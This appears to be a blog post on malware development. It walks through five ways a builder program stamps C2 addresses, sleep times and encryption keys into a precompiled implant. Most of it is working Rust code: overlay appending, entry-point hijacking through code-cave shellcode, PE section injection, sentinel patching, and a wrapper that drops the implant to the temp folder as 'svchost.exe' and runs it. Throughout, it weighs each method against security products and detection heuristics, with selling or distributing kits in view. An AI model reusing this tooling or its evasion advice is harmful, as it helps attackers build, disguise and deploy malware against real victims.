Table of Contents

Intro

During my dive into the world of malware development, after creating some proof-of-concept beacons and other tooling, I kept circling back to the same question: how do malware builders actually work?

The core problem is straightforward. You have a compiled binary — your implant, beacon, RAT, whatever — and you need a builder program that can stamp operator-supplied configuration (C2 address, sleep time, encryption keys, etc.) into that binary without shipping the source code and without invoking a compiler at build time.

This rules out the naïve approach of just templating config values into source and running cargo build. You’d have to distribute the entire toolchain and your source tree, which is a non-starter if you’re selling or distributing a compiled kit.

So how do you get config into a binary post-compilation? I came up with (and researched) five methods, ordered roughly from crude to elegant:

  1. Barbaric — Append Bytes
  2. Okay-ish — Entry-Point Shellcode Injection
  3. Decent — Custom PE Section
  4. Smooth — Sentinel Patching
  5. Most Flexible — Compiled Wrapper (my favorite)

Let’s walk through each.


The Barbaric Method (append bytes)

The simplest idea: just append raw bytes to the end of the PE file. The executable’s own code knows to seek past its legitimate file size and read whatever’s tacked on.

Builder side:

use std::fs;

fn stamp_config(stub_path: &str, output_path: &str, config: &[u8]) -> std::io::Result<()> {
    let mut buf = fs::read(stub_path)?;

    // Append a length prefix so the stub knows how many bytes to read.
    let len = (config.len() as u32).to_le_bytes();
    buf.extend_from_slice(config);
    buf.extend_from_slice(&len);

    // Append a magic trailer so the stub can validate.
    buf.extend_from_slice(b"CFGX");

    fs::write(output_path, buf)
}

Stub (implant) side:

use std::env;
use std::fs;
use std::io::{self, Read, Seek, SeekFrom};

fn read_appended_config() -> io::Result<Vec<u8>> {
    let exe_path = env::current_exe()?;
    let mut file = fs::File::open(exe_path)?;

    // Read the 4-byte magic trailer.
    file.seek(SeekFrom::End(-4))?;
    let mut magic = [0u8; 4];
    file.read_exact(&mut magic)?;
    if &magic != b"CFGX" {
        return Err(io::Error::new(io::ErrorKind::InvalidData, "no config found"));
    }

    // Read the 4-byte length that precedes the magic.
    file.seek(SeekFrom::End(-8))?;
    let mut len_buf = [0u8; 4];
    file.read_exact(&mut len_buf)?;
    let len = u32::from_le_bytes(len_buf) as usize;

    // Now read `len` bytes of config.
    file.seek(SeekFrom::End(-8 - len as i64))?;
    let mut config = vec![0u8; len];
    file.read_exact(&mut config)?;

    Ok(config)
}

Pros:

  • Dead simple to implement.
  • Works on any format (PE, ELF, Mach-O) — there’s no format-specific parsing.

Cons:

  • The overlay is trivially visible in a hex editor. You can encrypt/compress it, but the decryption routine is still in the binary and easy to find.
  • Some security products flag PE files whose size exceeds the sum of their section sizes (overlay detection).
  • The PE checksum won’t match, which may matter in some environments.

The Okay-ish Method (entry-point shellcode injection)

Instead of appending data, this method patches the PE’s entry point to redirect into a small injected shellcode stub. That stub’s job is to set up the configuration in memory — for example, writing it to a known global address or storing it in an environment variable — then jump back to the original entry point.

The high-level flow:

  1. Builder reads the stub PE and locates the original entry point (OEP).
  2. Builder writes a small shellcode blob into slack space (padding at the end of .text or in a code cave).
  3. Builder patches the PE entry point to the start of the shellcode.
  4. The shellcode contains hardcoded config bytes and writes them to a predetermined virtual address (e.g., a global static mut buffer in the stub).
  5. The shellcode jumps to the OEP and normal execution continues.

Builder side (simplified concept):

use goblin::pe::PE;
use std::fs;

struct PatchSite {
    file_offset: usize,
    rva: u32,
}

/// Find usable slack space at the end of .text
fn find_code_cave(pe: &PE, raw: &[u8]) -> Option<PatchSite> {
    for section in &pe.sections {
        let name = String::from_utf8_lossy(&section.name);
        if !name.starts_with(".text") {
            continue;
        }

        let raw_size = section.size_of_raw_data as usize;
        let virt_size = section.virtual_size as usize;

        // Slack space sits between virtual_size and raw_size.
        if raw_size > virt_size {
            let cave_offset = section.pointer_to_raw_data as usize + virt_size;
            let cave_rva = section.virtual_address + virt_size as u32;
            let cave_size = raw_size - virt_size;

            // Make sure the cave is big enough for our stub.
            if cave_size >= 256 {
                return Some(PatchSite {
                    file_offset: cave_offset,
                    rva: cave_rva,
                });
            }
        }
    }
    None
}

fn inject_entry_shellcode(
    stub_path: &str,
    output_path: &str,
    config: &[u8],
    config_rva: u32,       // RVA of the global buffer in the stub
    image_base: u64,
) -> anyhow::Result<()> {
    let mut raw = fs::read(stub_path)?;
    let pe = PE::parse(&raw)?;
    let oep = pe.header.optional_header.unwrap()
        .standard_fields.address_of_entry_point;

    let cave = find_code_cave(&pe, &raw)
        .ok_or_else(|| anyhow::anyhow!("no suitable code cave found"))?;

    // Build a tiny x86-64 stub:
    //   lea rdi, [image_base + config_rva]
    //   mov rcx, config_len
    //   <inline config bytes via rep stosb from embedded blob>
    //   jmp image_base + oep
    let mut shellcode: Vec<u8> = Vec::new();

    // -- snip: assemble your position-dependent stub here --
    // The exact encoding depends on your assembler / hand-rolled bytes.
    // Key idea: write `config` bytes to `image_base + config_rva`, then
    // jmp to `image_base + oep`.

    // Placeholder: in practice you'd use something like `iced-x86` or
    // `keystone` to assemble this.
    let _ = (&config, config_rva, image_base, oep, &mut shellcode);

    // Patch the shellcode into the code cave.
    raw[cave.file_offset..cave.file_offset + shellcode.len()]
        .copy_from_slice(&shellcode);

    // Patch entry point to our cave.
    // (offset of AddressOfEntryPoint in the PE optional header)
    let ep_offset = pe.header.dos_header.pe_pointer as usize
        + 4   // "PE\0\0"
        + 20  // COFF header
        + 16; // offset of AddressOfEntryPoint in optional header
    raw[ep_offset..ep_offset + 4].copy_from_slice(&cave.rva.to_le_bytes());

    fs::write(output_path, raw)?;
    Ok(())
}

Stub side:

The stub itself just declares a zeroed global buffer at a known address:

#[no_mangle]
#[used]
static mut CONFIG_BUFFER: [u8; 4096] = [0u8; 4096];

When execution reaches main, it reads CONFIG_BUFFER — the injected shellcode already populated it before the CRT ever ran.

Pros:

  • Config lives in a regular memory page, not in an obvious overlay.
  • Harder to spot than appended bytes since it blends with executable code.

Cons:

  • Architecture-specific (you need different shellcode for x86 vs x86-64).
  • Brittle: ASLR means you either need the image base to be fixed or you write position-independent shellcode that resolves addresses at runtime.
  • Writing correct shellcode is error-prone and tough to maintain.
  • Code-cave hunting isn’t guaranteed to succeed — you might need to extend a section or add a new one, which starts to overlap with method 3.

The Decent Method (custom PE section)

Rather than hiding in slack space or dangling off the end of the file, this method adds (or repurposes) a dedicated PE section — say .config — and writes the serialized configuration there. The stub binary parses its own PE headers at runtime, finds the section by name, and reads the config.

Builder side:

use goblin::pe::section_table::SectionTable;
use std::fs;

const SECTION_NAME: &[u8; 8] = b".config\0";
const FILE_ALIGNMENT: u32 = 0x200;
const SECTION_ALIGNMENT: u32 = 0x1000;

fn align(value: u32, alignment: u32) -> u32 {
    (value + alignment - 1) & !(alignment - 1)
}

fn inject_config_section(
    stub_path: &str,
    output_path: &str,
    config: &[u8],
) -> anyhow::Result<()> {
    let mut raw = fs::read(stub_path)?;
    let pe = goblin::pe::PE::parse(&raw)?;

    let last_section = pe.sections.last()
        .ok_or_else(|| anyhow::anyhow!("no sections"))?;

    // Compute the new section's addresses.
    let new_virt_addr = align(
        last_section.virtual_address + last_section.virtual_size,
        SECTION_ALIGNMENT,
    );
    let new_raw_offset = align(
        last_section.pointer_to_raw_data + last_section.size_of_raw_data,
        FILE_ALIGNMENT,
    );
    let raw_size = align(config.len() as u32, FILE_ALIGNMENT);

    // Build the section header.
    let mut header = [0u8; 40];
    header[..8].copy_from_slice(SECTION_NAME);

    // VirtualSize
    header[8..12].copy_from_slice(&(config.len() as u32).to_le_bytes());
    // VirtualAddress
    header[12..16].copy_from_slice(&new_virt_addr.to_le_bytes());
    // SizeOfRawData
    header[16..20].copy_from_slice(&raw_size.to_le_bytes());
    // PointerToRawData
    header[20..24].copy_from_slice(&new_raw_offset.to_le_bytes());
    // Characteristics: IMAGE_SCN_MEM_READ | IMAGE_SCN_CNT_INITIALIZED_DATA
    let chars: u32 = 0x4000_0040;
    header[36..40].copy_from_slice(&chars.to_le_bytes());

    // Locate where to write the new section header.
    let section_header_offset = pe.header.dos_header.pe_pointer as usize
        + 4
        + 20
        + pe.header.coff_header.size_of_optional_header as usize
        + (pe.sections.len() * 40);

    // Make sure there's room in the header gap.
    if section_header_offset + 40 > pe.sections[0].pointer_to_raw_data as usize {
        anyhow::bail!("not enough room for another section header");
    }

    // Write the section header.
    raw[section_header_offset..section_header_offset + 40]
        .copy_from_slice(&header);

    // Increment NumberOfSections.
    let num_sections_offset = pe.header.dos_header.pe_pointer as usize + 4 + 2;
    let new_count = (pe.sections.len() as u16 + 1).to_le_bytes();
    raw[num_sections_offset..num_sections_offset + 2]
        .copy_from_slice(&new_count);

    // Update SizeOfImage.
    let size_of_image = align(new_virt_addr + raw_size, SECTION_ALIGNMENT);
    let soi_offset = pe.header.dos_header.pe_pointer as usize
        + 4 + 20 + 56;
    raw[soi_offset..soi_offset + 4]
        .copy_from_slice(&size_of_image.to_le_bytes());

    // Pad file to the new raw offset and write config data.
    raw.resize(new_raw_offset as usize, 0);
    raw.extend_from_slice(config);
    raw.resize((new_raw_offset + raw_size) as usize, 0);

    fs::write(output_path, raw)?;
    Ok(())
}

Stub side:

use std::env;
use std::fs;
use goblin::pe::PE;

fn read_pe_section_config(section_name: &str) -> anyhow::Result<Vec<u8>> {
    let exe = env::current_exe()?;
    let raw = fs::read(&exe)?;
    let pe = PE::parse(&raw)?;

    for section in &pe.sections {
        let name = String::from_utf8_lossy(&section.name)
            .trim_end_matches('\0')
            .to_string();

        if name == section_name {
            let offset = section.pointer_to_raw_data as usize;
            let size = section.virtual_size as usize;
            return Ok(raw[offset..offset + size].to_vec());
        }
    }

    anyhow::bail!("section '{section_name}' not found")
}

Pros:

  • Clean and well-structured — the config has a proper home.
  • The stub doesn’t need architecture-specific tricks; it just parses its own PE at runtime.

Cons:

  • Adding a section named .config is a bit conspicuous. You could pick something less obvious (.rsrc2, .reloc, etc.) or overwrite an unused existing section.
  • Structural PE modifications can break code signing and trigger static analysis heuristics.

The Smooth Method (sentinel patching)

This is arguably the most common technique in real-world builders. The idea is simple: compile the stub with a known placeholder value — a magic sentinel — in a global static, and have the builder do a binary search-and-replace to swap the sentinel for the real config.

Because the sentinel lives in .data or .rdata, patching it doesn’t change the PE structure at all. No new sections, no overlays, no entry-point hooks. The file layout is identical to what the compiler produced; only the content of an initialized static changes.

Stub side:

/// 64-byte sentinel the builder will search for and replace.
/// Use something random enough that it won't collide with compiler output.
#[no_mangle]
#[used]
static CONFIG_SENTINEL: [u8; 64] = *b"<<~~__BUILDER_CONFIG_PLACEHOLDER_THAT_WONT_COLLIDE_EASILY__~~>>";

At runtime, the stub just reads CONFIG_SENTINEL — by the time it executes, the builder has already swapped in the real config:

fn get_config() -> &'static [u8] {
    // In a real implementation you'd have a length prefix or a
    // serialization format so you know where config ends.
    &CONFIG_SENTINEL
}

Builder side:

use std::fs;

const SENTINEL: &[u8; 64] =
    b"<<~~__BUILDER_CONFIG_PLACEHOLDER_THAT_WONT_COLLIDE_EASILY__~~>>";

fn patch_sentinel(
    stub_path: &str,
    output_path: &str,
    config: &[u8],
) -> anyhow::Result<()> {
    anyhow::ensure!(
        config.len() <= SENTINEL.len(),
        "config ({} bytes) exceeds sentinel slot ({} bytes)",
        config.len(),
        SENTINEL.len(),
    );

    let mut raw = fs::read(stub_path)?;

    // Find the sentinel.
    let pos = raw
        .windows(SENTINEL.len())
        .position(|w| w == SENTINEL.as_slice())
        .ok_or_else(|| anyhow::anyhow!("sentinel not found in stub"))?;

    // Overwrite with config, zero-pad the remainder.
    raw[pos..pos + config.len()].copy_from_slice(config);
    raw[pos + config.len()..pos + SENTINEL.len()].fill(0);

    fs::write(output_path, raw)?;
    Ok(())
}

If you need more than 64 bytes (you almost certainly do), just make the sentinel larger or use a length-prefixed scheme where the first 4 bytes encode the config length and the rest is payload:

#[no_mangle]
#[used]
static CONFIG_SLOT: [u8; 4096] = {
    let mut buf = [0u8; 4096];
    // First 16 bytes are the magic, rest is zeroed.
    let magic = *b"__CFG_SENTINEL__";
    let mut i = 0;
    while i < 16 {
        buf[i] = magic[i];
        i += 1;
    }
    buf
};

Pros:

  • Zero structural changes to the PE — no new sections, no overlays.
  • The binary is indistinguishable from a “normal” build at the PE-header level.
  • Trivial to implement and rock-solid in practice.
  • Works on any format (ELF, Mach-O) without format-specific code in the builder, since you’re just doing a byte scan.

Cons:

  • Config size is bounded by the sentinel slot you compiled in. You have to decide on a maximum size upfront.
  • If the compiler reorders or deduplicates statics, the sentinel could theoretically disappear — #[used] and #[no_mangle] prevent this, but it’s worth knowing.
  • The plaintext sentinel is visible in the stub binary on disk (before patching). Not a security issue since you’d distribute the patched output, but if someone gets the raw stub they can see your marker.

The Most Flexible Method (compiled wrapper)

All the previous methods share a constraint: they modify an existing binary. This method flips the model entirely. Instead of patching the stub, the builder compiles a brand-new, tiny wrapper that embeds the pre-built stub as a byte blob and the config as hardcoded constants.

The key insight is that the wrapper is so trivially small that you can ship its source or compile it on the fly without meaningful IP exposure. The real implant logic stays opaque inside the embedded blob.

Wrapper template (what the builder compiles):

// wrapper.rs — generated by the builder.
use std::io::Write;

/// Pre-compiled implant binary, embedded at compile time.
const STUB: &[u8] = include_bytes!("stub.exe");

/// Config values stamped by the builder.
const C2_HOST: &str = "{{C2_HOST}}";
const C2_PORT: u16 = {{C2_PORT}};
const SLEEP_MS: u64 = {{SLEEP_MS}};
const ENCRYPTION_KEY: &[u8; 32] = b"{{ENCRYPTION_KEY}}";

fn main() {
    // Option A: Write stub to a temp file and execute it, passing config
    // via command-line args, environment variables, or a named pipe.
    let tmp = std::env::temp_dir().join("svchost.exe");
    std::fs::write(&tmp, STUB).unwrap();

    std::process::Command::new(&tmp)
        .env("CFG_HOST", C2_HOST)
        .env("CFG_PORT", C2_PORT.to_string())
        .env("CFG_SLEEP", SLEEP_MS.to_string())
        .env("CFG_KEY", hex::encode(ENCRYPTION_KEY))
        .spawn()
        .unwrap();

    // Option B: Instead of writing to disk, allocate RWX memory and
    // reflectively load the PE from the embedded bytes. This avoids
    // touching disk entirely but is more complex.
}

Builder side:

The builder is essentially a templating engine + cargo build invocation:

use std::fs;
use std::process::Command;

fn build_wrapper(
    wrapper_template: &str,
    stub_path: &str,
    c2_host: &str,
    c2_port: u16,
    sleep_ms: u64,
    key: &[u8; 32],
    output_path: &str,
) -> anyhow::Result<()> {
    let workspace = tempfile::tempdir()?;

    // Copy stub into the workspace so include_bytes! can find it.
    let stub_dest = workspace.path().join("stub.exe");
    fs::copy(stub_path, &stub_dest)?;

    // Render the wrapper source.
    let source = wrapper_template
        .replace("{{C2_HOST}}", c2_host)
        .replace("{{C2_PORT}}", &c2_port.to_string())
        .replace("{{SLEEP_MS}}", &sleep_ms.to_string())
        .replace("{{ENCRYPTION_KEY}}", &String::from_utf8_lossy(key));

    let src_path = workspace.path().join("wrapper.rs");
    fs::write(&src_path, source)?;

    // Compile.
    let status = Command::new("rustc")
        .arg(&src_path)
        .arg("-o")
        .arg(output_path)
        .arg("--edition=2021")
        .status()?;

    anyhow::ensure!(status.success(), "rustc failed");
    Ok(())
}

Pros:

  • Maximum flexibility: the config isn’t constrained to a fixed-size slot. It’s real Rust code — you can put anything in there.
  • The implant binary is never structurally modified, which means its hash is stable and code signing (if any) stays intact.
  • You can swap the delivery mechanism (drop-to-disk, reflective loading, process hollowing) by changing the wrapper template without touching the implant.

Cons:

  • Requires a Rust toolchain on the machine running the builder. This is the big one — it’s a heavy dependency for an operator’s box.
  • Compile times add latency to the build step (though rustc on a single small file is fast).
  • The wrapper source, while minimal, does reveal the delivery mechanism. Whether that matters depends on your threat model.

Comparison

MethodPE Structure ModifiedNeeds CompilerConfig Size LimitComplexity
Append BytesNo (overlay only)NoUnlimitedTrivial
Entry-Point ShellcodeYes (EP + cave)NoCave-dependentHigh
Custom PE SectionYes (new section)NoArbitraryMedium
Sentinel PatchingNoNoFixed slotLow
Compiled WrapperNo (new binary)YesUnlimitedMedium

Closing Thoughts

In practice, sentinel patching is the most popular approach in the wild because it hits the sweet spot of simplicity, reliability, and stealth. The PE structure stays clean, implementation is a dozen lines of code, and it works across platforms with no format-specific logic.

If you need unbounded config or want to decouple the delivery mechanism from the implant entirely, the compiled wrapper is the way to go — just accept the toolchain dependency.

The other three methods have their niches. Appended bytes are fine for quick prototypes where stealth doesn’t matter. Custom PE sections work well when you have structured config that outgrows a sentinel slot. And shellcode injection is there if you need to run code before the CRT initializes, though it’s rarely worth the fragility.

Pick the one that fits your project’s constraints and build from there.